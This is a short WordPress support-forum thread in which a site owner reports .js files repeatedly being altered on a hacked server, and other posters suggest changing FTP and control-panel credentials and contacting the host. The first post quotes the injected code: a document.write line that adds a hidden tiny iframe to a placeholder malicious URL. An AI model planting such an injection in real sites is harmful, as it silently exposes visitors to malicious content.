Hacked site. JS files constantly being modified (4 posts)

  1. smilinggoat
    Posted 2 years ago #

    I have a couple WordPress installations on a server. 3/4 of them are constantly having all of their .js files modified, and getting a variation of the following line added at the end of the files:

    ;document.write('<iframe src="malicious_url_here" scrolling="auto" frameborder="no" align="center" height="11" width="11"></iframe>');

    I've gone through and upgraded all of my plugins, re-installed WordPress 3.4.2, and changed my passwords, but as soon as I delete the offending lines from the .js files, the modification comes back.

    How best can I remove this infection? What can I look for? My websites are showing up as serving malicious files.


  2. WPyogi
    Forum Moderator
    Posted 2 years ago #

  3. cjchamberland
    Posted 2 years ago #

    You said you changed all your passwords, does that include FTP as well as your hosting control panel? Have you also looked for FTP accounts that are no longer in use and should be removed?

  4. @smilinggoat: talk to bluehost; they are normally pretty secure. The vector may be from other, insecure accounts.

Topic Closed

This topic has been closed to new replies.

About this Topic